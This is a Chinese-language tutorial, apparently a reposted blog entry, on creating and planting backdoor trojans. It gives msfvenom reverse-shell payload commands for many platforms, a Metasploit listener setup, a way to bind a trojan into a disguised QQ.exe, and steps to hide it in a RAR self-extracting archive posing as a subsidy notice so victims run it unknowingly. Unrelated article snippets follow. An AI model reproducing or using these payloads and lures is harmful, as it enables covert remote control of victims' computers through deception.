后门木马生成与上线

news/2024/11/23 14:37:17/

后门木马生成与上线

  • 一、后门是什么?
  • 二、msfvenom生成后门木马
  • 三、正向shell和反向shell
  • 四、上传后门
  • 五、本地监听
  • 六、捆绑马
  • 七、上线session - Linux
  • 八、自解压

一、后门是什么?

后门是指那些绕过安全性控制⽽获取对程序或系统访问权的程序⽅法。

  • 一段程序
  • 绕过安全控制获取访问权
  • 不被察觉的控制目标

二、msfvenom生成后门木马

1、msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。
[* msfvenom在shel I里使用,不是msfconsole终端]

	metasploit中有大量的攻击载荷,而msfvenom就是用于快速创建我们需要的攻击载荷并生成指定平台运行的程序,实际上msfvenom就是
攻击载荷(payloads)和编码器(encoders)的组合工具,他是独立于msf控制台(msfconsole)之外的,无法在控制台内直接调用。

在这里插入图片描述

#1、Linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=8888 -f elf > shell.elf#2、Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=你的IP lport=9999 -f exe -o shandi.exe#3、Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f macho > shell.macho#4、安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP LPORT=8888 -o ~/Desktop/test2.apk#5、PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f raw > shell.php#6、ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f asp > shell.asp#7、JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的IPLPORT=你监听的端口 -f raw > shell.jsp#8、WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f war > shell.war#9、Bath
msfvenom -p cmd/unix/reverse_bash LHOST=你的IP LPORT=你监听的端口 -f raw > shell.sh#10、Perl
msfvenom -p cmd/unix/reverse_perl LHOST=你的IP LPORT=你监听的端口 -f raw > shell.pl#11、Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=你的IP LPORT=你监听的端口 -f raw > shell.py

在这里插入图片描述

三、正向shell和反向shell

msf,payload模块

  • set payload windows/meterpreter/bind_tcp 正向
  • set payload windows/x64/meterpreter/reverse_tcp 反向
  • 正向shell:控制端主动发起连接去连接被控制端
  • 反向shell:被控制端主动连接控制端
  • 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。
  • 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。

四、上传后门

上传后门至目标靶机

  • 文件上传漏洞
  • 其他传播方式

五、本地监听

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.9.148
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.9.148:9999

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

六、捆绑马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.154.129 LPORT=8888 -f exe -x /home/kali/QQ1.exe -o /home/kali/QQ.exe
  • 没有x64,默认是x32
  • -p:指定后面的payload
  • windows/meterpreter/reverse_tcp:声明这是一个windows系统下的一个反弹tcp
  • LHOST=192.168.154.129:设置反弹回来的ip,即你的kali的ip地址,还可以设置返回的端口,如果不设置,默认返回端口是4444
  • -f: 代表要捆绑的文件类型,这里是一个exe文件
  • -x:指定你要捆绑的文件的路径及文件名,这里我选择的是QQ1.exe
  • -o:指定生成的木马文件的路径及文件名,这里我把它保存在原路径里,名字就叫QQ.exe
  • 生成完毕

七、上线session - Linux

靶机执行木马后门,上线meterpreter session

chmod 777./demo.elf
./demo.elf

生成l inux.后门时需注意系统位数为32还是64
常见架构:

  • 32bit:i386,i686,x86,arm
  • 64bit:x64,x86_64,amd64,arm64,aarch64

八、自解压

  • 如果对方就是不下载安装你发的文件怎么办?
  • RAR有一个自解压的功能
  • 我们可以利用这一点来达到目的

1、准备好一个木马程序与“高温补贴通知”的文件。(“高温补贴通知”的文件作为伪装)
在这里插入图片描述
2、使用RAR软件进行压缩。
在这里插入图片描述
3、点击“常规”。
在这里插入图片描述
4、点击“高级”。
在这里插入图片描述
5、填写解压后的路径。(最好是C盘)
在这里插入图片描述
6、填写安装内容。
在这里插入图片描述
7、隐藏。
在这里插入图片描述
在这里插入图片描述
8、连续点击两次“确定”,成功压缩。
在这里插入图片描述
9、上传到目标机,点击运行。
在这里插入图片描述
10、可以只看到“高温补贴通知”的文件,另一个木马文件被隐藏运行了。
11、木马成功上线。
在这里插入图片描述


http://www.ppmy.cn/news/715125.html

相关文章

关于联想小新v2000笔记本不能调节亮度

问题描述: 前两天笔记本突然不能进行亮度调节,显卡驱动重新安装之后也没有反应 解决方法: 首先查看右键属性列表中有没有图形属性菜单 如果安装了此软件,可以在显示选项中的颜色列表中进行亮度调节。

菜鸟技术--笔记本如何调亮度

菜鸟小计,才知道笔记本如何调亮度,联想的本本 同时按住fn键和上下键,就可以选择你需要的亮度了 (fn向上选择键----调亮,fn向下选择键----调暗),呵呵。。。。。 笨鸟飞飞儿

Yoga 14s电脑亮度不能调节?教你一招一下搞定。

说一下背景,本人电脑联想yoga 14s,不知道最近那一天突然发现电脑亮度没法调节,写小论文时眼睛都要被刺瞎了,试了重装驱动,无果。升级系统,无果。最后河海大学的好朋友问了客服,客服一针见血问出…

Spring Boot 中的 Elasticsearch 的数据操作配置

Spring Boot 中的 Elasticsearch 的数据操作配置 Elasticsearch是一个基于Lucene的搜索引擎,可以快速地存储、搜索和分析大量的数据。Spring Boot是一个开发框架,提供了快速构建基于Spring的应用程序的工具和技术。在本文中,我们将讨论如何在…

番外12:获取晶体管漏极电流源平面的仿真波形

番外12:获取晶体管漏极电流源平面的仿真波形 老是有同学反应,仿真中无法获取漏极电流源平面的仿真波形,在此给出解释与解决办法。 1、ADS能够访问到部分器件的电流源平面波形 对于某些器件,比如说CGH40010F,可以在仿…

闲云拾财:想做副业,你必须知道的几个正规副业,值得收藏

受疫情影响,很多人现在都很重视副业的发展,都希望通过副业收入来改善自己的生活,但很多人却不知道该做什么,今天给大家分享几类副业,大家可根据个人实际和兴趣爱好进行选择,做完后你一定会发现惊喜。 一、卖…

适合大学生的六个兼职项目,挣钱的同时还能提升自己

父母给的生活费不够用,校园生活比较拮据,想赚钱没有时间,想在网上兼职找不到合适的,这是不是你的现状 首先,兼职能够帮助学生提高经济实力。大学生兼职可以赚取一定的收入,这对于负担不起大学生生活的学生…

写作副业好做吗?写作作为副业可以赚钱吗?

写作副业好做吗?写作作为副业可以赚钱吗? 每天下班,不是想着吃啥好吃的,就是想着去哪玩,时间久了,习以为常,认为生活就只能这样了。但是,我们再下班后,很大一部分时间都…